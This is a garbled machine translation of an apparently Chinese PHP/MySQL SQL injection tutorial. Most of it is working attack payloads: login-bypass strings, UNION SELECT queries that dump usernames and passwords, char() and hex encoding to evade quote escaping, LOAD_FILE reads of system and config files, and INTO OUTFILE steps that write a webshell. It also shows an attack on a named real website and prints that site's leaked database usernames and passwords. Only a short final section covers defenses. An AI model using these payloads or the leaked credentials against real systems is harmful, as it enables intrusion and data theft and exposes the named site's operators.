We build the injecting statement
Enter the input box
A% 'and 1 = 2 Union SELECT 1, Username, 3, 4, 5, 6, 7, 8, password, 10 ,11 from alphaauthor # put
SQL statement is in
Select * from alphadb where title Like '% a%' and 1 = 2 Union SELECT 1, UserName, 3, 4, 5, 6, 7, 8, password, 10 ,11 from alphaauthor #%
The result is shown in Figure 17.
How, come out, haha, everything is in progress.
C: Let's take a look at various injections from the injecting place.
Attack mode
1) Let's take a look at the backstage.
First
//login.php
.......
$ query = "select * from alphaauthor where username = '"
. $ Http
_POST
_VARS ["UserName"]. "'And
Password = '". $ Http
_POST
_VARS ["password"]. "'";
$ result = my
SQL
_Query ($ query);
$ DATA = My
SQL
_FETCH
_Array ($ Result);
IF ($ DATA)
{
Echo "Successful Landing";
}
ESLE
{
Echo "re-landing";
EXIT;
}
.........
?>
UserName and Password have not been directly putted directly
SQL is executed.
See how we get worse?
The most classic or that:
In the user name and
Enter all password boxes
'Or' '='
Bring into
SQL statement is in
Select * from alphaauthor where username = '' or '=' 'and password =' 'or' '=' '
In this way, $ DATA is definitely true, that is, we have successfully logged in.
There are other bypassing methods, the principle is the same, that is, try to let $ data return to be true.
We can use the following Chinese law.
1.
Username
Password input 'or'a' = 'a
SQL became
Select * from alphaauthor where username = '' OR'A '=' a 'and password =' 'or'a' = 'a'
2.
Username
Password input 'or 1 = 1 and' '='
SQL became
Select * from alphaauthor where username = 'or 1 = 1 and' '=' 'and password =' 'or 1 = 1 and' '=' '
Username
Password input 'or 2> 1 and' '='
SQL became
Select * from alphaauthor where username = '' or 2> 1 and '' = '' and password = '' or 2> 1 and '' = '' 3.
Username Enter 'OR 1 = 1 #
Password input
SQL became
Select * from alphaauthor where username = '' or 1 = 1 # and password = 'anything'
The back is commented out, of course, returns or really.
4.
Assume that admin Id = 1, you can also
Username Enter 'OR ID = 1 #
Password input
SQL became
Select * from alphaauthor where username = '' or id = 1 # and password = 'Anything'
Figure 18
Look at the renderings 19
how about it? Log in directly!
As the saying goes, I don't think I can't do it.
There are more constructors waiting for the class to think about it.
2) The second commonly injected place should be regarded as a front desk.
I have already mentioned many times, and it involves digital type, character type, etc., this is no longer repeated here.
Just give an example review
Bihai Chao Download Station - V2.0.3 Lite is injecting
Vulnerability,
The code is no longer listed.
Direct view
Http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, Password, 4, Username, 6, 7, 8, 9, 10 ,11, 12, 13, 14, 15, 16, 17, 18% 20FROM% 20DL
_USERS
Figure 20
Look, we get what we want.
User name alpha
Password a long string.
Why we have to put password in 3 fields, put username at 5 fields, we have already mentioned it, that is, we speculate that 3 and 5 paragraphs should be a string type, and we want to display UserName The field type of Password should be the same, so we put it like this.
Why use 18 fields? I don't know if you still remember that we mention that UNION SELECT must require the same number of select before and after, we can speculate in the number of SELECTs to guess the need for 18 fields, only the content of the Union Select will be displayed normally. Oh!
3) Others such as data modification, where users are registered to have a user level application.
We have already told the update and insert above, because it is not very common, this is no longer elaborated, and some of the advanced utilization of Update and Insert will be mentioned below.
skill.
2: The following will enter MAGIC
_QUOTES
_GPC = ON injection
Attack teaching link
Magic
_QUOTES
_GPC = ON, all the '(single quaum),
"(Double Quotes), / (reverse slope) and empty characters will automatically turn into an escape character with a backslapped line.
This makes a method of injection into bubbles. At this time, we can only inject digital type and not
INTVAL () has been handled, and the digital type has been speaking a lot, because the digital type is not used to single quotes naturally have no problem, we can inject it directly for this situation.
1) If it is a character type, it must be like this, and there is no quotation number on characters. Here we have to use some string processing functions,
There are a lot of string handle functions, here we mainly talk about the following, specific to MY
SQL Chinese Reference Manual 7.4.10.
Char () interprets the parameters as an integer and returns ASCII from these integers.
A string consisting of code characters.
Of course, you can use the 16 credits of characters instead of characters, which is ok, the method is to add 0x in front of the 16-encyclopedia, see the example below.
//login.php
......
$ query = "SELECT *". $ Art
_system
_DB
_Table ['User']. "
Where username = usrname and password = '". $ PW."' ";
......
?>
Suppose we know that the user name of the background is alpha
After converting into ASCII, it is Char (97, 108, 112, 104, 97)
Transforming into 16-based 0x616c706861
(We will provide 16 credits and ASCII conversions in the CD
tool)
Ok, enter directly in your browser:
http://localhost/site/admin/login.php? username = char (97, 108, 112, 104, 97)% 23
SQL statement becomes:
Select * from alphaauthor where username = char (97, 108, 112, 104, 97) # and password = ''
Figure 21
As we expect, he successfully implemented, we got what we wanted.
Of course, we can also construct this
http://localhost/site/admin/login.php? username = 0x616c706861% 23
SQL statement becomes:
Select * from alphaauthor where username = 0x616c706861% 23 # and password = ''
We once again be a success. Very sense of accomplishment,
Maybe you will ask us if you can put # it in char ()
In fact, Char (97, 108, 112, 104, 97) is equivalent to 'alpha'
Note that Alpha adds quotation marks to represent the alpha string.
We know in my
If executed in SQL
MY
SQL> SELECT * FROM DL
_USERS WHERE Username = alpha;
Error 1054 (42S22): Unknown Column 'Alpha' in 'Where Clause'
Look at the return error. Because he will think that Alpha is a variable. So we have to add quotation marks on Alpha.
as follows
MY
SQL> SELECT * FROM DL
_USERS where username = 'alpha';
This is correct.
If you go to the ##, you will become 'alpha #'
Bring into
SQL statement
SELECT * FROM DL
_USERS where username = 'alpha #';
Of course, it is ok, because even alpha # this user is not.
Ok, let's take an example below.
//display.php
......
$ query = "SELECT *". $ Art
_system
_DB
_Table ['Article']. "Where type = $ TYPE;
......
?>
The code displays the content according to the type, and $ TYPE does not filter and there is no additional number in the program.
Suppose Type contains xiaohua class, Xiaohua's char () conversion is
CHAR (120, 105, 97, 111, 104, 117, 97)
We build
Http://localhost/display.php? type = char (120, 105, 97, 111, 104, 117, 97) and 1 = 2 Union Select 1, 2, UserName, 4, Password, 6, 7, 8, 9, 10, 11 from alphaauthor
Bring into
The SQL statement is:
SELECT * ". $ Art
_system
_DB
_Table ['Article']. "
WHERE TYPE = CHAR (120, 105, 97, 111, 104, 117, 97) and 1 = 2 Union Select 1, 2, UserName, 4, Password, 6, 7, 8, 9, 10, 11 from alphaauthor
Look, our username and
The password is like it! No screenshot, imagine it: P
2) Perhaps someone will ask, in Magic
_QUOTES
_GPC = ON case in powerful load
_file () can still be used?
This is exactly what we have to have, Load
_file () use format is load
_file ('file path')
We have found that just convert the 'file path' to char (). Try it
Load
_file ('c: /boot.ini') transforms into
Load
_file (CHAR (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105)))
Figure 22
Put it in the specific injection
http://localhost/down/index.php? URL = & DLID = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, LOAD
_file (CHAR (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105)), 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18
See Figure 23
Look, we saw the content of boot.ini.
Unfortunately, INTO OUTFILE '' can't be bypassed, otherwise it is more cool. But there is still a place to use Select * from table intfile '', ... (first sell a Cat, will tell you below)
Three: some injection
Skills, many are personal discovery.
UNION SELECT
skill
UNION is used to combine the results of multiple SELECT statements to a result set. SELECT in SELECT
The column listed in the _expression section must have the same type. The column name used in the first SELECT query will return to the column names of the result set.
However, we can speculate in the type of column with the following method, but save a lot of time
Let's first
Http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, 3, 4, 5, 6, 7, 8, 9, 10 ,11, 12, 13, 14, 15, 16, 17, 18
Figure 24
Look at
The software description is written 3, the author is written 4, we can guess the position of the 3 and 4 is character, we look at the number of downloads in front, this should be int type, right. Ok, we build it according to here, it is estimated that UserName and Password are also characterized.
Try it
Http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, Password, 4, Username, 6, 7, 8, 9, 10 ,11, 12, 13, 14, 15, 16, 17, 18% 20FROM% 20DL
_USERS
Figure 25
Haha, this method can probably guessed as long as you see.
2.Load
_file read and write
skill
I don't know if you have found it in us with loading
_file () cannot be displayed in the web when reading and writing a PHP file. E.g:
'C: / Apache / HTDOCS / Site / LIB /
SQL.inc.php 'transformation to 16 Enter: 0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870
We are constructed as follows
http://localhost/site/display.php? id = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, LOAD
_file (0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870), 4, 5, 6, 7, 8, 9, 10, 11
Figure 26
Discover the place where the article content is originally displayed
Sql.inc.php, but it is empty, why?
Let's take a look at the source of the web page
First
Figure 27
Haha, look at the marked place, dizzy, it is here, but why?
Original HTML <> for labeling, haha, understand! You can remember where to find it next time.
4. MD5 nightmare
Dr. Wang, the University of Shandong University, has recently engaged in MD5, and we will come to work, we are more cool than him, don't calculate, haha.
MD5 we have a way to bypass, but not where you can, the MD5 function in PHP can not be bypassed, because all things you entered are in it, it is not running. Can bypass
MD5 in the SQL statement. Of course
The function in SQL can be bypassed, the truth is the same.
See example first:
//login.php
......
$ query = "SELECT * from alphaauthor where username = md5 ($ usrname) and password = '". $ PW. "'";
......
?>
We are submitted directly in the browser
HTTP: /LOGIN.PHP? Username = char (97,98)) OR 1 = 1% 23
Bring into
SQL statement becomes select * from alphaauthor where username = md5 (char (97,98)) or 1 = 1 #) and password = '"". $ PW. "
Remember that the MD5 is like a character, because there is OR 1 = 2 behind, so we just put a char (97, 98). OK, the landing is successful! Look, MD5 is not used in front of us.
5. Core technology, using PHP My
SQL injection
The vulnerability is written directly to WebShell. .
Direct use of injection to get WebShell, this should be everyone thinking, let you teach you below.
Here to assume that you already know the physical path where the site is located, I assume that the website path is c: / apache / htdocs / site. Website MY
SQL connection information is placed / LIB /
Sql.inc.php
1) Suitable for MAGIC
_QUOTES
_GPC = OFF
Suppose we can upload pictures, or TXT, ZIP, and so on, we take us
Trojan change
JPG suffix, uploaded path to /upload/2004091201.jpg
2004091201.JPG
Ok, we started http: //localhost/site/display.php? Id = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, LOAD
_file ('c: /apache/htdocs/site/upload/2004091201.jpg'), 4, 5, 6, 7, 8, 9, 10 ,11% 20InTo% 20Outfile'c: / apache / htdocs / site / shell .php '
Because of Outfile, the web page is displayed abnormal, but our task is completed.
Figure 28
Let's take a look at http://localhost/site/shell.php? Cmd = DIR
Figure 29
Suffen? WebShell we have created success. Did you see the front 12? That is, we are output from SELECT 1, 2!
2) Let's talk about Magic
_QUOTES
_GPC = ON is time to save the webshell method, obviously, can be used in Magic
_QUOTES
_GPC = OFF is time.
We read his profile directly, use
Skill 2 method
http://localhost/site/display.php? id = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, LOAD
_file (0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870), 4, 5, 6, 7, 8, 9, 10, 11
get
Sql.inc.php content is
Ok, we know my
SQL's root
Password, we find the background of phpmyadmin
http: // localhost / phpmyadmin /
Use root
The password is empty.
Figure 30
Then we newly established a table structure is as follows:
#
# 数据 数据 结构 结构 `TE`
#
Create Table Te (
CMD text Not Null
ENGINE = myisam default charSet = latin1;
#
# 导出
Database content` TE`
#
INSERT INTO TE VALUES ('
');
OK, it's time we used Select * from Table Into Outfile ''.
Directly in PHPMYADMIN
SQL input
Select * from `TE` INTO OUTFILE 'C: /APACHE/HTDOCS/SITE/CMD1.PHP'
Figure 31
OK, successfully executed, we go http: //localhost/site/cmd1.php? Cmd = DIR to see the effect is as shown in Figure 32
A good WebShell is! Haha, I also like it too.
But I don't know if you have found that we are in Magic.
_QUOTES
_GPC = ON, complete this work, actually in phpMyAdmin, can not consider the limitations of quotation marks, haha, explain what? Note PHPMYADMIN is too great, this is what we are talking MAGIC
_QUOTES
_GPC = ON by around the Thane sold!
6. Discover that we can also use Update and INSERT to insert our data, then get our Webshell, and use the above example,
//reg.php
......
$ query = "INSERT INTO MEMBERS
VALUES ('$ ID', '$ login', '$ Pass', '$ Email', '2')
......
?>
We entered in Email
Suppose the ID we registered is 10
Then we can find a place that can be injected.
Http://localhost/site/display.php? ID = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, Email, 4, 5, 6, 7, 8, 9, 10 ,11% 20FROM% 20User% 20where% 20ID = 10% 20 INTO% 20Outfile'c: /apore/htdocs/site/test.php '
Ok, we have our wenshell.
7.my
SQL's cross-library query
Don't you always hear MY?
SQL can't query, haha, today I will teach you a good way, through this method to achieve the changed cross-library query, the method is through Load
_file to read the My MY
The file content under the Data folder under SQL is achieved.
Give an example.
Before this, let's talk about my mom.
Structure under SQL Data Folders
Data folder
The folder generated by the database name is generated by the table name to generate three files of FRM, MYD, MYI, for example.
MY
There are alpha in SQL
Database, there are two tables in Alphaauthor and alphadb in the Alpha library.
The alpha folder content is as follows 33
Where alphadb.frm places data in the LPhadb table, alphadb.frm places the structure of the table, and the content placed in alphadb.myi is MY
The version of SQL will not be different, and it can be judged by using notepad.
Experiment start
Suppose we know one another
The database Yminfo210 exists, and there is a table user, the user is putting this admin information.
we
http://localhost/site/display.php? id = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, LOAD
_file ('Yminfo210 / User.myd'), 4, 5, 6, 7, 8, 9, 10 ,11
Explanation, load
_file default directory is MY
Data directory under SQL, so we use
Load
_file ('yminfo210 / user.myd'), of course, LOAD
_file ('. info210 / user.myd') is also the same, note that the default path of INTO OUTFILE is in the database folder.
The result is shown in Figure 34
We read the content
Hong admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer http://www.yoursite.com (Department of Sui KA of Sui of Sui 127.0.0.1 d |?????? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com? SDFASDFSDFA ASDFADFASD? E 麷 AM 麷 A 127.0.0.1 222 22222223423
Although there is a pile, we can still see that the user name is admin,
The password is 698D51A19D8A121CE581499D7B701668, followed by additional information.
In this way, we have achieved the curve cross-library, and the examples below will also be mentioned!
Said so much below us to use it, this test is a famous security site - black and white network
Listening to people saying black and white
Vulnerability? Let's take a look.
http://www.heibai.net/down/show.php?id=5403 and 1=1
normal display.
Figure 35
http://www.heibai.net/down/show.php?id=5403 and 1=2
The display is not normal.
Figure 36
Ok, we continue
http://www.heibai.net/down/show.php?id=5403 and 1=1 Union Select 1
The result is as follows
Figure 37
Note that there is no display name in the picture, and it is also included.
WARNING: MY
SQL
_FETCH
_Object (): Supplied argument is not a valid mysql result resource in d: /web/heibai/down/show.php on line 45
WARNING: MY
SQL
_FETCH
_Array (): Supplied Argument is not a valid mysql result resource in d: /web/heibai/down/global.php on line 578
Dizziness, the website is coming out, then you will die!
We continue until we guessed
http://www.heibai.net/down/show.php?id=5403 and 1=1 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19
Normally it is normal.
Figure 38
Good, our conversion statement has become
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19
Show as shown in Figure 39
Look at the introduction is 12, we can guess that you should be a characteristic!
OK, let's take a look at the file content first
D: /web/heibai/down/show.php is converted to ASCII
Char (100, 58, 47, 119, 101, 98, 47, 104, 101, 105, 98, 97, 105, 47, 100, 111, 119, 110, 47, 115, 104, 111, 119, 46, 112, 104, 112)
we
View-source: http://www.heibai.net/down/show.php? ID = 5403% 20and% 201 = 2% 20Union% 20Select% 201, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, loading_file (100, 58, 47, 119, 101, 98, 47, 105, 47, 100, 111, 119, 110, 47, 115, 104, 111, 119, 46, 112, 104, 11)), 13, 14, 15, 16, 17, 18, 19, 19
View-source: is an inspection
Code, as for why, we will tell
Show its source
Code
Figure 40
Because there is a sentence in Show.php
If we submit them directly in the browser to jump to list.php
We found this request ("./include/config.inc.inc.php");
Good things, you should put this configuration file, OK continues
D: /web/heibai/down/include/config.inc.php
Converted to char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
We entered
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, LOAD
_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)), 13,14,15,16,17,18,19
The result is shown in Figure 41
Main content
.......................
YMDOWN (Night Cat Download System) is an application to the website to provide download
Services
// ----------------------------------- ---------- //
// Regular setting //
// ----------------------------------- ---------- //
//
Database information
$ dbhost = "localhost"; //
Database host name
$ dbuser = "download"; //
database username
$ dbpasswd = "kunstar988"; //
database
password
$ DBNAME = "Download"; //
data storage name
// cookie name
$ cookie
_Name = "Heibai";
// version number
$ Version = "1.0.1";
// Data table name
$ DOWN
_Table = ymdown;
$ DOWN
_User
_Table = ymdown
_user;
$ DOWN
_sort1
_Table = ymdown
_sort1;
$ DOWN
_sort2
_Table = ymdown
_sort2;
Dizzy, use the night cat's download system, and we know
$ dbuser = "Download"; // Database User Name
$ dbpasswd = "kunstar988"; //
database
password
Maybe it will be useful.
The table name is the default table name, we know the people of the night cat
Password is placed in ymdown
_USER
We continue http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3 ,username, 5 ,password ,7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 from YMDown
_User
The result is shown in Figure 42
According to the prompted we know that the file size is UserName, the application platform is Password (in connection with Figure 36)
Username = DLOAD, Password = 6558428, the backstage of the night cat default in the admin directory, I tried didn't find it for a long time, halo.
I want to connect directly to my
SQL, found that Telnet port is not open. Let's take a look else!
http://www.heibai.net/vip/Article/login.php
It looks like it is
Member landing, let's take a look
D: /web/heibai/vip/Article/login.php
Transform into Char (100, 58, 47, 119, 101, 98, 47, 104, 101, 118, 105, 112, 47, 97, 114, 116, 105, 99, 108, 101, 110, 108, 111, 103, 105, 110, 46, 112, 104, 112)
We entered
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, LOAD
_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)), 13,14,15,16,17,18,19
The result is shown in Figure 43:
among them
Require ("./include/global.php");
Require ("./include/config.inc.inc.php");
Require ("./mainfunction.php");
REQUIRE ("./function.php");
Of course, let's see config.inc.php.
D: /web/heibai/vip/Article/include/config.inc.php
Converted to char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
enter
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, LOAD
_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)), 13,14,15,16, 17, 18,19 results are shown in Figure 44
Show a lot of good things.
$ dbhost = "localhost"; //
Database host name
$ dbuser = "root"; //
database username
$ dbpass = "234ytr8ut"; //
database
password
$ DBNAME = "article"; //
data storage name
$ ymcms
_User
_Table = "user";
$ ymcms
_Usergroup
_Table = "usergroup";
$ ymcms
_USERRACE
_Table = "Userrace";
The table is still the default table, and there is root
password
If you can connect it to my My MY
How good SQL, so we can Into Outfile
Looking for PHPMYADMIN, I didn't find it, I may not use it at all.
Read c: /winnt/php.ini discovery
Magic quotes
;
Magic quotes for incoming Get / Post / Cookie Data.
Magic
_QUOTES
_GPC = ON
55555555, in the pain, let's see if you can get a few
member account
guess
Member account is placed in the USER table, we directly read the user.myd file in the Article folder directly.
Article / user.myd converted into
CHAR (97, 114, 116, 105, 99, 108, 101, 47, 117, 115, 101, 114, 46, 109, 121, 100)
We entered
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, LOAD
_file (CHAR (97, 114, 116, 105, 99, 108, 101, 47, 117, 115, 101, 114, 46, 109, 121, 100)), 13, 14, 15, 16, 17, 18, 19
The result is shown in Figure 45:
Dizzy, there is no return. Let's read Article / User.frm
http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, LOAD
_file (CHAR (97, 114, 116, 105, 99, 108, 101, 47, 117, 115, 101, 114, 46, 102, 114, 109), 13, 14, 15, 16, 17, 18, 19
The result is shown in Figure 46
Dizziness, the table structure is also successful, but why do article / user.myd can't read it? If MAGIC
_QUOTES
_GPC = OFF We can also take a look at Into Outfile, but ...
Depressed, the test is ended, the following work is still left to you!
The problem described in the article has notified Xingkun!
4: PHP My
SQL injection method.
In the previous topic, there have been a lot of prevention methods. Here, I will mainly talk about PHP MySQL injection.
Action method of attack.
See everyone, in Magic
_QUOTES
_GPC = ON, many injections
The attack has no effect.
We can use this to reinforce our procedure. The addslashes () function is equivalent to Magic
_QUOTES
_GPC = ON, and Magic
_QUOTES
_GPC = ON does not conflict, we can filter it like this
$ usrname = addslashes ($ usrname);
$ query = "select * from username where userid = '$ usrname');
For ID types we can use the intVal () function, the intVal () function can convert the variable into an integer type so that it is possible.
We can
$ ID = INTVAL ($ ID);
$ query = "Select * from alphadb where articleid = '$ ID');
If it is a character type?
We can use addslashes () to filter it, then filter "%" and "
".
E.g:
$ search = addslashes ($ search);
$ Search = STR
_Replace
_ "," /
_ ", $ SECH);
$ Search = STR
_Replace ("%", "/%", $ search;
Remember, don't be in Magic
_QUOTES
_GPC = ON is replaced / //, as follows:
$ Password = STR
_Replace ("//", ", $ password);
I remember to mention this issue in Darkness's article "once in a PHP site" (included in the CD).
There is also a place where landing is logged in. If you use only one administrator, we can directly encrypt UserName and Passwd, so you don't have to be injected.
Technology development.
UserName = MD5 ($ HTTP
_POST
_VARS ["UserName"]);
Passwd = md5 ($ http
_POST
_VARS ["passwd"]);
I am like this in my background.
postscript:
This article says so much, injected is a flexible
Technology, there are many
Technology is still in development, any problems and opinions can come to me to find me in the Yellow Corps (www.cnwill.com), but also welcome the content criticism of the text.
